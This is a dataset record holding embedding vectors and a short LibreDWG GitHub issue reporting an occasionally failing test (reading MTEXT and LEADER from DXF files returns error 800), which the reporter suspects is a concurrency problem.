-0.0019870379474014044, -0.012545112520456314, 0.010811235755681992, 0.03083096258342266, -0.008203133940696716, -0.004462184384465218, 0.014788953587412834, 0.001623688731342554, -0.028120867908000946, 0.005219845101237297, 0.007343480829149485, -0.01482538040727377, -0.007092141080647707, 0.002719200449064374, -0.009390621446073055, -0.0015508367214351892, -0.0005318195326253772, -0.004961220547556877, -0.008909798227250576, -0.014978368766605854, -0.010774808935821056, -0.015838023275136948, -0.004097924567759037, 0.012304700911045074, 0.02629956789314747, 0.008246845565736294, -0.000031445877539226785, 0.006771592423319817, -0.0022802671883255243, -0.005015859380364418, -0.0042946250177919865, -0.039165228605270386, -0.0031180651858448982, 0.006054000463336706, -0.003604352241382003, -0.007525610737502575, 0.025177648290991783, 0.023487482219934464, -0.010323126800358295, 0.017061935737729073, 0.013608751818537712, -0.009594607166945934, -0.000690727960318327, -0.009310483932495117, -0.009769451804459095, -0.0038975814823061228, -0.010978794656693935, 0.011190066114068031, -0.006520253140479326, -0.0014461120590567589, 0.007460043765604496, 0.006818946450948715, -0.006571249570697546, -0.018242137506604195, 0.0025625687558203936, 0.005554964300245047, -0.01439555361866951, -0.015998296439647675, 0.02969447150826454, -0.002711915411055088, 0.002358583267778158, 0.011037076823413372, 0.009106499142944813, 0.01411871612071991, -0.011867589317262173, 0.0007276092655956745, -0.008152137510478497, -0.007438188418745995, -0.005955650005489588, 0.011292058043181896, 0.012311986647546291, -0.01194772683084011, 0.027873171493411064, 0.02188473753631115, -0.007132209837436676, 0.008793234825134277, -0.016624825075268745, -0.01213714201003313, 0.006993791088461876, 0.015371769666671753, 0.010709242895245552, 0.009026361629366875, -0.010374123230576515, 0.004181704018265009, -0.016872521489858627, -0.0015936372801661491, -0.004163491073995829, -0.029534196481108665, -0.005573177244514227, 0.013237206265330315, -0.001619135495275259, 0.004964862950146198, 0.022802673280239105, 0.007955437526106834, -0.0001184983120765537, 0.008472686633467674, -0.0061013540253043175, -0.03913608938455582, 0.009004506282508373, 0.012260990217328072, 0.013040506280958652, -0.0018549937522038817, -0.015750600025057793, -0.014045863412320614, -0.013805451802909374, 0.011612607166171074, 0.006647744216024876, -0.0001372804690618068, -0.002358583267778158, -0.015255207195878029, 0.01411871612071991, -0.010643675923347473, 0.03715451434254646, 0.028281142935156822, -0.005700668320059776, -0.005751664750277996, -0.0051834192126989365, 0.004061498679220676, 0.009390621446073055, 0.01701822504401207, -0.004017787054181099, -0.008509112522006035, 0.032637692987918854, 0.008647531270980835, 0.019116362556815147, -0.0008036484941840172, -0.012770953588187695, -0.009390621446073055, 0.02861626259982586, 0.0002467861049808562, 0.033919885754585266, -0.006316267419606447, -0.012202708050608635, 0.007955437526106834, -0.0048847259022295475, -0.023327207192778587, -0.0024095794651657343, -0.027902312576770782, 0.013368340209126472, 0.029956737533211708, 0.008611105382442474, 0.002721021883189678, 0.00006192419095896184, -0.0002609012008178979, -0.025833316147327423, 0.02606644295156002, -0.007336195558309555, -0.0062361303716897964, -0.01391473039984703, -0.0006479274015873671, 0.0040651410818099976, 0.020325705409049988, 0.022846383973956108, -0.0271009411662817, 0.0005759860505349934, -0.003178168088197708, -0.006367263849824667, -0.015750600025057793, 0.008851516991853714, -0.015488333068788052, -0.005128779914230108, 0.01425713486969471, -0.02392459288239479, -0.025731323286890984, -0.01843155361711979, -0.0010299449786543846, 0.006778877694159746, 0.018737532198429108, -0.0020872096065431833, 0.02316693216562271, 0.011554325930774212, -0.007875300012528896, -0.014803524129092693, -0.02299208752810955, -0.024638542905449867, -0.010104571469128132, 0.010082715190947056, 0.02644527330994606, -0.019480621442198753, -0.011146354489028454, -0.025002803653478622, 0.006163278594613075, -0.0005723434733226895, 0.000054952030041022226, -0.007744166534394026, -0.01373988576233387, -0.016697676852345467, -0.00005850925299455412, -0.0064983973279595375, -0.015896303579211235, -0.008968080393970013, 0.021112507209181786, 0.001066370983608067, -0.0265472661703825, 0.011313914321362972, -0.005103281699120998, -0.013951156288385391, -0.004170776344835758, 0.0023421915248036385, -0.015298917889595032, -0.018140146508812904, -0.020660825073719025, -0.01918921433389187, -0.0019524333765730262, -0.013055076822638512, -0.0032054875046014786, 0.008895227685570717, 0.01541548129171133, -0.0062761991284787655, 0.0019415055867284536, -0.021739033982157707, 0.010876801796257496, 0.004137992858886719, 0.030335567891597748, 0.0013614215422421694, 0.005292696878314018, 0.009929725900292397, 0.0007030217093415558, -0.03418215364217758, 0.0016173141775652766, 0.0005204363842494786, -0.010242990218102932, -0.008144852705299854, -0.003371225902810693, -0.007135852240025997, -0.005584104917943478, 0.03348277509212494, 0.003074354026466608, -0.009492614306509495, 0.026765821501612663, 0.0004890189738944173, -0.025979019701480865, -0.017513617873191833, 0.02012171968817711, 0.005467541981488466, -0.004309195093810558, 0.01430813129991293, -0.0022820886224508286, 0.005722523666918278, -0.009091928601264954, 0.007390834391117096, 0.0030670687556266785, -0.030976666137576103, -0.028747394680976868, -0.01643540896475315, -0.003544249339029193, -0.026008160784840584, 0.0004632931377273053, -0.004054213408380747, 0.02816457860171795, 0.012698101811110973, 0.002582603134214878, 0.007172278594225645, -0.0016519188648089767, 0.01472338754683733, 0.006225202698260546, 0.007875300012528896, 0.0037664480041712523, 0.004170776344835758, 0.0003467299393378198, -0.006742451805621386, -0.02261325716972351, 0.009193921461701393, -0.013885589316487312, -0.000686174666043371, 0.007525610737502575, -0.011568896472454071, 0.011700029484927654, -0.007649458944797516, -0.001390562392771244, 0.012734527699649334, -0.015022080391645432, -0.021462196484208107, -0.003985004033893347, -0.006833516526967287, 0.025221358984708786, 0.012727242894470692, -0.007394476793706417, -0.0010354089317843318, -0.012129856273531914, -0.02337091788649559, -0.009645603597164154, 0.02112707681953907, 0.024143150076270103, -0.006487469654530287, -0.031064089387655258, -0.024973662570118904, -0.016624825075268745, 0.03304566442966461, -0.002624492859467864, -0.0018686535768210888, -0.025148507207632065, -0.015590325929224491, 0.011394050903618336, 0.0023986517917364836, 0.002655455144122243, 0.0015471942024305463, 0.029082514345645905, -0.0033347997814416885, -0.0024897167459130287, 0.0034386138431727886, 0.032054875046014786, -0.0004949382273480296, 0.019830312579870224, 0.000729430525097996, 0.0007203240529634058, 0.009864159859716892, 0.011925870552659035, 0.033919885754585266, -0.01567774824798107, 0.010913228616118431, 0.01916007325053215, -0.017790455371141434, -0.017994441092014313, -0.0029687185306102037, 0.0032000236678868532, 0.002323978580534458, -0.0019888593815267086, -0.009288628585636616, -0.0007913547451607883, -0.0038320147432386875, 0.00010290343925589696, 0.017528189346194267, -0.010461545549333096, 0.011466903612017632, 0.003531500231474638, 0.007004718761891127, 0.005944722332060337, -0.013659748248755932, 0.0005709774559363723, -0.005613246001303196, -0.012392123229801655, -0.008028289303183556, 0.014803524129092693, -0.02558561973273754, 0.0006288037402555346, -0.010104571469128132, -0.008137566968798637, -0.02455112151801586, 0.0043529062531888485, -0.03196745365858078, 0.021112507209181786, -0.005187061615288258, -0.013732600025832653, 0.000047012301365612075, -0.01643540896475315, -0.014388267882168293, -0.005285412073135376, -0.019451482221484184, -0.002741056028753519, -0.032462846487760544, 0.002353119198232889, 0.033919885754585266, 0.0013177103828638792, -0.017542758956551552, 0.006811661180108786, -0.012690817005932331, -0.012501401826739311, 0.00023494767083320767, -0.001346851116977632, 0.005693383049219847, 0.021870167925953865, -0.0026536337099969387, -0.03706709295511246, 0.012916658073663712, -0.0024970020167529583, -0.026692969724535942, 0.013696174137294292, 0.008669386617839336, -0.050034746527671814, 0.011488758958876133, -0.001195683260448277, -0.0009871444199234247, 0.004021429922431707, -0.014475690200924873, -0.020864810794591904, -0.01355047058314085, 0.024070298299193382, 0.008734953589737415, 0.002271160716190934, 0.002405937062576413, 0.006349050905555487, 0.0030415705405175686, -0.019349489361047745, -0.02399744652211666, 0.0037445921916514635, 0.027727467939257622, -0.01628970541059971, -0.000015751396858831868, 0.0008391638402827084, 0.0008086570887826383, -0.016785098239779472, 0.02119992859661579, 0.01524063665419817, 0.02806258760392666, 0.008917083963751793, 0.0056496718898415565, -0.017236780375242233, -0.006319910287857056, -0.001981574110686779, 0.010090000927448273, 0.009099213406443596, -0.009485329501330853, -0.003974075894802809, -0.006123209837824106, 0.01180930808186531, -0.023633185774087906, -0.0007649458711966872, 0.016479119658470154, -0.008436260744929314, -0.008756808936595917, 0.002404115628451109, 0.016551971435546875, 0.008552823215723038, -0.012064289301633835, -0.0008774111629463732, -0.0007307965424843132, 0.032812535762786865, 0.01722221076488495, 0.0033020165283232927, -0.0015736030181869864, -0.002314872108399868, -0.009040932171046734, -0.021112507209181786, 0.014410124160349369, 0.0018112825928255916, 0.0016938088228926063, 0.0031107799150049686, 0.00008912985504139215, 0.013798166997730732, 0.014541257172822952, -0.010461545549333096, 0.010257559828460217, 0.0030579622834920883, 0.01684338040649891, 0.007088498678058386, 0.011175495572388172, 0.003506002016365528, 0.004181704018265009, -0.010774808935821056, -0.013295488432049751, 0.009201206266880035, -0.02450740896165371, -0.01392930094152689, -0.011022506281733513, -0.008385264314711094, -0.0006342676351778209, 0.0020489622838795185, 0.03528950363397598, 0.005992076359689236, -0.017251351848244667, 0.0066040330566465855, 0.014045863412320614, 0.012006008066236973, 0.004673455376178026, 0.01284380629658699, 0.011037076823413372, 0.023458341136574745, 0.0018158358288928866, -0.0049794334918260574, 0.0013586896238848567, 0.011007935740053654, -0.017513617873191833, 0.00008998359407996759, 0.019378628581762314, 0.002806623000651598, -0.007940866984426975, 0.015896303579211235, 0.012530541978776455, 0.005289054475724697, 0.0017994442023336887, -0.002724664518609643, -0.01943691074848175, -0.0023676897399127483, 0.004360191524028778, 0.010264845564961433, 0.004771805368363857, -0.01532805897295475, 0.016974514350295067, -0.009543610736727715, -0.00008668248483445495, 0.004950292874127626, -0.019728319719433784, -0.01595458574593067, 0.014657820574939251, -0.015459191985428333, -0.0076276035979390144, 0.011976866982877254, -0.012202708050608635, 0.007095783948898315, 0.016479119658470154, 0.010607250034809113, -0.008589250035583973, -0.002236556028947234, 0.0018941517919301987, 0.009995292872190475, -0.009725741110742092, -0.0035205723252147436, -0.0075911772437393665, 0.008720383048057556, 0.015459191985428333, 0.0005167938070371747, -0.0037482348270714283, -0.022205287590622902, -0.007281556259840727, -0.0044221156276762486, -0.010665531270205975, -0.0013331914087757468, 0.022307278588414192, 0.004990361165255308, 0.030131584033370018, 0.006534823682159185, 0.0024806102737784386, -0.012872946448624134, 0.014803524129092693, 0.0037919459864497185, -0.018285850062966347, 0.012399408966302872, -0.0006697829812765121, 0.0008815090986900032, 0.000647472043056041, -0.0076567442156374454, -0.023502051830291748, 0.01815471611917019, 0.00015185086522251368, -0.014577683061361313, 0.023006659001111984, -0.006330837961286306, 0.014286275021731853, 0.009718455374240875, 0.005646029021590948, 0.013011365197598934, -0.0017602861626073718, 0.003733664518222213, 0.005503967870026827, 0.002874010941013694, 0.005074141081422567, 0.02755262330174446, -0.02047140896320343, -0.007729595992714167, -0.007077571004629135, 0.010607250034809113, -0.013025935739278793, 0.008377978578209877, 0.028018875047564507, -0.010009863413870335, -0.01923292502760887, -0.01712021790444851, 0.001165631809271872, 0.009587322361767292, -0.0019323989981785417, 0.035085517913103104, 0.006895441096276045, 0.018387842923402786, 0.0070302169770002365, -0.005514895543456078, 0.03158862143754959, 0.011124499142169952, 0.004906581714749336, -0.0056096031330525875, -0.011379481293261051, 0.007350765634328127, 0.0033839750103652477, -0.02409943751990795, -0.005999361630529165, -0.017134787514805794, 0.020733676850795746, 0.003156312508508563, 0.0070702857337892056, -0.016683105379343033, -0.01860639825463295, -0.008013718761503696, -0.01241397950798273, -0.0009716633940115571, 0.010272130370140076, 0.02243841253221035, 0.003012429689988494, -0.003733664518222213, -0.021564189344644547, -0.006731524132192135, 0.014300845563411713, 0.008866087533533573, -0.003323872108012438, -0.020048867911100388, -0.005846372339874506, 0.007802448235452175, 0.009193921461701393, -0.003027000231668353, 0.023735178634524345, 0.021913878619670868, -0.020427698269486427, -0.013324628584086895, -0.026882383972406387, -0.012064289301633835, -0.0003883921599481255, -0.0075328960083425045, -0.013375625014305115, -0.008021004498004913, -0.03966062515974045, 0.011802022345364094, 0.0026062799151986837, -0.024288853630423546, 0.005871870554983616, 0.011394050903618336, -0.0009816805832087994, -0.002283909823745489, 0.006094069220125675, -0.011182780377566814, 0.013353769667446613, -0.007372621446847916, -0.02150590717792511, 0.015473762527108192, 0.0030506770126521587, -0.008035574108362198, 0.01588173396885395, -0.004629744216799736, 0.0017329667462036014, 0.005387404467910528, 0.0048847259022295475, -0.006010289303958416, -0.009762166999280453, -0.020005157217383385, 0.008705812506377697, -0.0012330199824646115, 0.005970220547169447, 0.009070073254406452, -0.008742238394916058, 0.020238282158970833, 0.010002578608691692, 0.0004266394826117903, -0.006268913857638836, 0.020587973296642303, -0.012144426815211773, -0.002883117413148284, -0.0016628466546535492, -0.002180095762014389, 0.014264419674873352, -0.016959942877292633, -0.011445047333836555, -0.007955437526106834, 0.0041889892891049385, 0.012530541978776455, -0.012406693771481514, -0.007365336176007986, -0.006607675459235907, -0.018548116087913513, -0.010257559828460217, -0.0067970906384289265, -0.0020398558117449284, -0.006254343315958977, 0.017892448231577873, -0.005981148220598698, -0.0019779314752668142, 0.007496469654142857, -0.003154491074383259, 0.001701093977317214, -0.010745668783783913, 0.01760104112327099, -0.016522832214832306, 0.012960368767380714, 0.0033038377296179533, 0.005707953590899706, 0.009303199127316475, -0.028703683987259865, -0.008137566968798637, 0.007802448235452175, 0.002418686170130968, -0.008618390187621117, 0.001968825003132224, -0.02147676609456539, 0.008924368768930435, -0.008545538410544395, 0.01709107682108879, -0.005766234826296568, -0.006899083498865366, 0.007569321896880865, 0.01410414557904005, 0.008494541980326176, 0.010388693772256374, -0.006254343315958977, -0.0015317130601033568, 0.0009561823680996895, 0.010512541979551315, -0.0035897819325327873, 0.0033366212155669928, 0.013295488432049751, -0.012268275022506714, -0.0037445921916514635, 0.01349947415292263, -0.003229164518415928, 0.012953083962202072, -0.009397907182574272, 0.0034185796976089478, -0.0035296790301799774, 0.005343693308532238, -0.0027756609488278627, 0.009988008067011833, 0.016114860773086548, -0.00018656939209904522, 0.010898658074438572, 0.014249849133193493, 0.013229921460151672, -0.001696540741249919, 0.019728319719433784, 0.005886440631002188, 0.014227993786334991, -0.006840801797807217, -0.0009288628934882581, 0.009456188417971134, 0.007033859845250845, 0.011073502711951733, -0.0010426940862089396, 0.01885409466922283, -0.008166708052158356, -0.005023144651204348, 0.00007905578968347982, -0.012049718759953976, -0.016420839354395866, 0.010366838425397873, -0.010680101811885834, 0.02026742324233055, 0.019976016134023666, 0.011204635724425316, -0.002369510941207409, -0.009157495573163033, 0.01161989290267229, -0.004997646436095238, 0.0024623973295092583, -0.02972361259162426, -0.01618771255016327, -0.01857725717127323, -0.00007347806240431964, -0.0006920939194969833, -0.015823451802134514, -0.010024433955550194, -0.007172278594225645, -0.010315841995179653, -0.0011847554706037045, -0.004214487504214048, -0.0013914729934185743, 0.03866983577609062, 0.010629105381667614, 0.007926296442747116, 0.004178061615675688, 0.01964089646935463, -0.02178274467587471, 0.007481899578124285, -0.020791957154870033, 0.02506108395755291, 0.0016928981058299541, -0.018169285729527473, -0.014410124160349369, 0.009827733039855957, -0.002564389957115054, -0.008603819645941257, 0.002564389957115054, -0.016624825075268745, 0.020107150077819824, 0.0016655785730108619, 0.011044361628592014, -0.013565040193498135, 0.0012321092654019594, -0.006290769204497337, 0.015532044693827629, 0.01325906254351139, -0.0032054875046014786, 0.01322263665497303, 0.0009998935274779797, -0.002582603134214878, 0.007037502247840166, 0.004086996428668499, 0.022380132228136063, -0.007889870554208755, 0.0016082077054306865, -0.005161563400179148, 0.005154278129339218, -0.015896303579211235, -0.006695097777992487, 0.005737094208598137, 0.016624825075268745, 0.005114209838211536, 0.03234628215432167, -0.01513864379376173, -0.010082715190947056, 0.004236343316733837, 0.005984791088849306, -0.01719306968152523, -0.02951962687075138, 0.004582390189170837, -0.012472260743379593, 0.0005860031815245748, -0.008698527701199055, 0.015313488431274891, -0.004232700448483229, -0.008968080393970013, -0.014628679491579533, 0.002289373893290758, -0.0014961977722123265, 0.016653964295983315, 0.008130282163619995, 0.02251126430928707, 0.030393850058317184, -0.0013850984396412969, -0.011554325930774212, -0.01946605183184147, 0.008203133940696716, -0.011241062544286251, 0.010250275023281574, -0.03252112865447998, 0.0018149252282455564, 0.009419762529432774, 0.011634462513029575, -0.007226917427033186, 0.002990574110299349, 0.004028715193271637, -0.005095996893942356, 0.008771379478275776, -0.007143137510865927, -0.0030634261202067137, -0.0007981845992617309, 0.022030441090464592, 0.0031417421996593475, -0.0024569332599639893, 0.004345621448010206, -0.010177423246204853, -0.0075620366260409355, 0.010942368768155575, 0.01308421790599823, 0.006680527701973915, 0.04076797515153885, 0.010825805366039276, 0.010599964298307896, 0.005598675459623337, 0.010862232185900211, -0.016872521489858627, -0.000871947268024087, 0.005299982149153948, 0.012778239324688911, 0.006010289303958416, 0.015022080391645432, -0.0015572112752124667, -0.01712021790444851, 0.008181278593838215, 0.013157069683074951, -0.0024095794651657343, 0.020413126796483994, 0.011343054473400116, -0.008399834856390953, 0.011758311651647091, -0.016202282160520554, 0.009820448234677315, 0.003048855811357498, 0.0002051238843705505, 0.0037027024663984776, -0.01505122147500515, 0.014890946447849274, 0.03234628215432167, -0.009295914322137833, 0.008887942880392075, -0.013907444663345814, 0.004964862950146198, -0.021462196484208107, -0.025323351845145226, 0.01251597236841917, -0.00012635266466531903, 0.011306628584861755, 0.012268275022506714, -0.004538679029792547, -0.005350978579372168, -0.005605960730463266, 0.003948577679693699, 0.004538679029792547, 0.025556478649377823, 0.022554976865649223, -0.02581874467432499, 0.0032929100561887026, 0.006206989753991365, -0.02596445009112358, 0.00009060966112883762, 0.014373697340488434, 0.0032273430842906237, -0.001502572325989604, -0.006396404933184385, -0.01923292502760887, -0.002405937062576413, 0.009856874123215675, 0.0005837265634909272, -0.000997161609120667, -0.020806528627872467, -0.01812557503581047, -0.010075430385768414, -0.029636189341545105, -0.01764475181698799, 0.010483401827514172, 0.016391698271036148, 0.016391698271036148, -0.035639192909002304, 0.006600390188395977, 0.000017231202946277335, -0.007339837960898876, 0.014818094670772552, -0.025556478649377823, -0.009244917891919613, 0.004152563400566578, -0.03514380007982254, 0.014890946447849274, 0.008691242896020412, 0.010796665214002132, -0.013178925029933453, -0.0008200402371585369, 0.0006729702581651509, 0.018285850062966347, -0.01684338040649891, -0.0020180002320557833, 0.012596108950674534, -0.003799231257289648, 0.025221358984708786, -0.007423617877066135, 0.0077951629646122456, 0.01891237683594227, 0.013113358058035374, 0.01749904826283455, -0.01653740182518959, -0.007325267419219017, -0.0020107149612158537, 0.0052526285871863365, -0.002668204251676798, -0.022773532196879387, -0.0038283721078187227, -0.0015991012332960963, -0.00028298445977270603, 0.0059775058180093765, -0.01615857146680355, 0.009463473223149776, -0.012974939309060574, 0.01339748129248619, -0.005518538411706686, -0.006323552690446377, 0.009011791087687016, 0.004658884834498167, 0.017047366127371788, 0.013215350918471813, -0.006793448235839605, 0.018009012565016747, -0.013506758958101273, 0.011437762528657913, -0.01784873753786087, -0.019903164356946945, -0.02533792145550251, -0.007445473223924637, 0.009973437525331974, 0.017936160787940025, -0.01853354647755623, 0.011576181277632713, 0.008195849135518074, -0.031501200050115585, 0.009281343780457973, -0.0008191295783035457, 0.022948376834392548, 0.002362225903198123, -0.013382910750806332, 0.02205958217382431, 0.03255026787519455, 0.004742664750665426, 0.025294210761785507, -0.013492188416421413, -0.0006365442532114685, -0.028776535764336586, -0.018271278589963913, 0.01643540896475315, -0.0033912600483745337, -0.009645603597164154, -0.0009361480479128659, -0.03359933942556381, -0.027144651859998703, 0.01787787862122059, 0.03144291788339615, 0.019218355417251587, 0.017790455371141434, -0.007831589318811893, 0.001273999223485589, -0.004917509388178587, 0.005507610272616148, 0.009186635725200176, 0.012836520560085773, -0.0016910767881199718, 0.008152137510478497, 0.012421264313161373, -0.01365246344357729, -0.02054426074028015, 0.04997646436095238, 0.009514469653367996, 0.02312322147190571, 0.01608571968972683, -0.0011328484397381544, 0.005839087069034576, -0.01577974110841751, -0.013506758958101273, -0.019786600023508072, 0.019801171496510506, 0.009805877692997456, 0.001761196879670024, -0.0036280290223658085, -0.008866087533533573, -0.0023859026841819286, -0.007376263849437237, -0.002624492859467864, -0.010293986648321152, -0.005241700913757086, -0.0268241036683321, -0.012428549118340015, 0.0020343917421996593, 0.03103494830429554, -0.022831814363598824, 0.006618603132665157, 0.005955650005489588, -0.016959942877292633, 0.002520678797736764, 0.0012120750034227967, 0.004407545551657677, 0.03764990717172623, -0.031297214329242706, -0.00028343978920020163, 0.01420613843947649, 0.0008760452037677169, 0.003635314293205738, 0.01719306968152523, 0.018067292869091034, -0.0014479332603514194, -0.021593330428004265, -0.0018440659623593092, 0.018999798223376274, 0.00002844357914000284, 0.0042946250177919865, 0.009055502712726593, -0.020719105377793312, 0.0007235113298520446, -0.0034167582634836435, 0.009682029485702515, 0.02755262330174446, 0.025381634011864662, 0.001066370983608067, -0.011124499142169952, 0.0008432617760263383, -0.003449541749432683, -0.01671224646270275, -0.0037063451018184423, -0.003720915410667658, -0.008407119661569595, -0.023808030411601067, -0.0013186209835112095, -0.013004080392420292, -0.007168635725975037, -0.0039959317073225975, -0.028805676847696304, -0.01505122147500515, -0.006250700913369656, 0.018766673281788826, -0.01306964736431837, 0.015736030414700508, 0.013025935739278793, 0.006491112522780895, -0.014082289300858974, -0.0050085741095244884, -0.008152137510478497, -0.009966152720153332, 0.004946650005877018, 0.004549606703221798, 0.0027009875047951937, -0.0014315416337922215, 0.0059775058180093765, -0.010446975007653236, 0.004666170105338097, -0.004531393758952618, 0.004545964300632477, -0.004116137512028217, -0.0011947726598009467, -0.013076932169497013, -0.01532805897295475, 0.026634687557816505, 0.006512967869639397, -0.0010399621678516269, -0.02989845722913742, -0.006895441096276045, 0.010293986648321152, -0.004513180814683437, 0.0013286381727084517, -0.011918585747480392, -0.002358583267778158, 0.009062787517905235, -0.00001791418981156312, 0.015663178637623787, -0.026357850059866905, -0.004881083499640226, 0.012108000926673412, -0.01477438397705555, 0.010024433955550194, -0.016581112518906593, -0.005081426352262497, 0.009944296441972256, 0.0025971734430640936, 0.0025152149610221386, -0.018416984006762505, -0.010162852704524994, 0.02551276795566082, 0.009281343780457973, -0.0028576194308698177, 0.003952220547944307, 0.017528189346194267, -0.0021691680885851383, 0.0006870853248983622, -0.009754881262779236, 0.030889244750142097, 0.018999798223376274, 0.017338773235678673, -0.008013718761503696, 0.011517900042235851, 0.0334244929254055, 0.009631033055484295, 0.009230347350239754, 0.006035787519067526, -0.013863733969628811, 0.01463596522808075, 0.01722221076488495, 0.0038866535760462284, 0.019670037552714348, -0.023837171494960785, 0.0033311571460217237, 0.01577974110841751, 0.007940866984426975, 0.002344012726098299, 0.049626775085926056, -0.002768375677987933, 0.013317343778908253, -0.017149358987808228, 0.005718881264328957, 0.009652888402342796, 0.016785098239779472, 0.0035970669705420732, -0.015182354487478733, 0.012013292871415615, 0.006869942881166935, 0.006035787519067526, 0.014424693770706654, 0.0003346638404764235, -0.01237755361944437, 0.018038153648376465, 0.0024332564789801836, -0.015357199124991894, 0.004906581714749336, -0.010840375907719135, 0.013018650934100151, 0.008902513422071934, 0.004757234826683998, 0.02054426074028015, -0.0032965524587780237, 0.0007717757835052907, -0.020791957154870033, 0.0066732424311339855, -0.0037591627333313227, -0.020252853631973267, -0.0020107149612158537, -0.007274271454662085, -0.016726816073060036, 0.01832956075668335, 0.015386340208351612, 0.012734527699649334, -0.004374762065708637, -0.002313050674274564, 0.022598687559366226, 0.014526686631143093, 0.014337271451950073, 0.008239559829235077, 0.019320348277688026, 0.046683553606271744, -0.0044585419818758965, -0.010374123230576515, -0.0031745254527777433, 0.003937650006264448, 0.006786162964999676, -0.0009516291320323944, -0.011394050903618336, 0.011598036624491215, -0.015692317858338356, -0.007317982614040375, 0.021097935736179352, 0.028252001851797104, -0.019699178636074066, 0.026634687557816505, 0.0005427473224699497, 0.0015089468797668815, -0.01805272325873375, -0.031151510775089264, 0.011037076823413372 ]
null
null
null
null
null
null
null
null
null
[ "LibreDWG", "libredwg" ]
Rarely ``` ok 347 # write MTEXT to add_mtext_2000.dxf not ok 348 # read MTEXT from add_mtext_2000.dxf: 800 ok 349 # write LEADER to add_leader_2000.dxf not ok 350 # read LEADER from add_leader_2000.dxf: 800 ``` looks like a concurrency problem to me
flaky add_test
https://api.github.com/repos/LibreDWG/libredwg/issues/572/comments
0
2023-01-12T06:55:25
2023-01-20T09:22:48Z
https://github.com/LibreDWG/libredwg/issues/572
1,530,201,961
572
false
This is a GitHub Issue repo:libredwg owner:LibreDWG Title : flaky add_test Issue date: --- start body --- Rarely ``` ok 347 # write MTEXT to add_mtext_2000.dxf not ok 348 # read MTEXT from add_mtext_2000.dxf: 800 ok 349 # write LEADER to add_leader_2000.dxf not ok 350 # read LEADER from add_leader_2000.dxf: 800 ``` looks like a concurrency problem to me --- end body ---
385
[ -0.0026045755948871374, 0.021107211709022522, -0.014342078939080238, 0.01868768222630024, 0.038521457463502884, 0.04351969435811043, -0.0045167203061282635, 0.05058726668357849, -0.02976658008992672, -0.02659890614449978, -0.002976657822728157, 0.0375027060508728, -0.00783163495361805, -0.03794841095805168, -0.013426796533167362, 0.032170191407203674, 0.009240373969078064, 0.01655467599630356, -0.009733830578625202, -0.025373222306370735, 0.006665644235908985, 0.017016295343637466, 0.006609931588172913, 0.025818925350904465, -0.02465691603720188, -0.00016005008365027606, -0.019531333819031715, -0.040145087987184525, -0.015066346153616905, -0.00788336805999279, -0.01712772250175476, 0.049823205918073654, 0.012033975683152676, -0.007648578379303217, 0.06039272993803024, -0.001837529125623405, 0.03966754674911499, 0.004954464267939329, 0.003197519574314356, 0.03632477670907974, -0.037789229303598404, -0.06513627618551254, -0.018783189356327057, 0.010856046341359615, -0.00020121292618568987, 0.021616585552692413, 0.004874874372035265, 0.038967158645391464, -0.03501950576901436, 0.002984616905450821, -0.0251822080463171, -0.022348811849951744, -0.015894079580903053, -0.03581540286540985, 0.0006163233774714172, -0.01986560970544815, 0.04437926411628723, 0.0026125346776098013, -0.015774695202708244, -0.005081807728856802, -0.029129860922694206, 0.04084547609090805, 0.0016494982410222292, 0.029129860922694206, 0.012861709110438824, 0.01310843788087368, -0.06153882294893265, 0.023733673617243767, -0.03043513372540474, 0.012933339923620224, -0.034319113940000534, -0.002045457484200597, -0.02822253666818142, 0.015265320427715778, 0.043169498443603516, -0.017318736761808395, 0.04100465774536133, 0.017302818596363068, -0.02082068845629692, -0.006470649503171444, -0.0009316978976130486, 0.03871247172355652, -0.03390524908900261, 0.03855329006910324, 0.009407512843608856, -0.013275575824081898, -0.03142204508185387, -0.06621870398521423, -0.010370548814535141, 0.004393355920910835, -0.008261419832706451, 0.03514684736728668, 0.005662813317030668, -0.020661508664488792, 0.0012813955545425415, -0.0428193025290966, -0.015042468905448914, 0.011954385787248611, -0.06360815465450287, -0.03616559877991676, -0.00751327583566308, -0.008010711520910263, -0.02444998174905777, 0.010840128175914288, 0.033873412758111954, -0.007425726857036352, 0.01588612049818039, 0.00233596027828753, 0.033650562167167664, 0.0923241525888443, 0.0046798791736364365, -0.024720586836338043, -0.017700767144560814, -0.02016805112361908, -0.029050271958112717, 0.03893532231450081, 0.006418915931135416, 0.0032989964820444584, -0.02585076168179512, -0.023542657494544983, -0.0551079660654068, -0.037120673805475235, -0.00598515197634697, -0.012622939422726631, -0.0081460140645504, 0.005404146388173103, 0.022714924067258835, 0.017557505518198013, -0.032026927918195724, -0.003683017333969474, -0.021552912890911102, -0.02909802459180355, 0.017541589215397835, -0.021903108805418015, 0.03565622493624687, -0.006351264659315348, -0.04558902978897095, 0.019260728731751442, 0.004297848325222731, -0.012495595961809158, -0.057654839009046555, -0.0607110857963562, 0.03963571414351463, -0.004488863982260227, -0.024322638288140297, -0.006219941657036543, -0.031055934727191925, 0.009120989590883255, 0.04269196093082428, 0.027219707146286964, -0.03396892175078392, -0.030928589403629303, 0.032536305487155914, 0.017987290397286415, 0.01033871341496706, -0.02163250371813774, 0.028540896251797676, 0.008746917359530926, -0.0019867599476128817, -0.019992953166365623, -0.0214096512645483, -0.015520008280873299, 0.012121523730456829, -0.03240896016359329, -0.039190009236335754, 0.00317762210033834, 0.032393041998147964, 0.027506228536367416, -0.02075701579451561, 0.028318045660853386, -0.027808669954538345, -0.007879388518631458, 0.02806335873901844, -0.009757707826793194, -0.04660777747631073, 0.010895841754972935, 0.0011878774967044592, 0.029209451749920845, 0.021314144134521484, -0.039253681898117065, -0.0011809134157374501, -0.003716842969879508, 0.006100556813180447, 0.00609259819611907, 0.05364351347088814, -0.03492399677634239, 0.03323669359087944, -0.019690511748194695, 0.002749826991930604, 0.0040730070322752, 0.006896454840898514, -0.007047675549983978, 0.03626110404729843, -0.0008874260820448399, 0.02179168350994587, -0.0187513530254364, -0.04581188037991524, -0.01602938212454319, -0.01728690043091774, -0.007652557920664549, 0.008850383572280407, 0.02629646472632885, -0.03368239849805832, -0.04374254494905472, 0.03146979957818985, 0.015090223401784897, -0.020295394584536552, 0.03883981332182884, 0.017239147797226906, -0.031119605526328087, -0.01325965765863657, -0.032393041998147964, -0.0017808214761316776, 0.01155643630772829, -0.018894614651799202, 0.012471719644963741, 0.008468353189527988, 0.02983025088906288, -0.014596766792237759, -0.03041921555995941, 0.04714898765087128, -0.018305649980902672, -0.014564930461347103, -0.0020245651248842478, -0.040081415325403214, 0.011094816029071808, 0.02105945721268654, 0.001617662375792861, -0.01613285019993782, 0.012957217171788216, 0.036006417125463486, -0.024179376661777496, 0.001607713638804853, 0.018257897347211838, 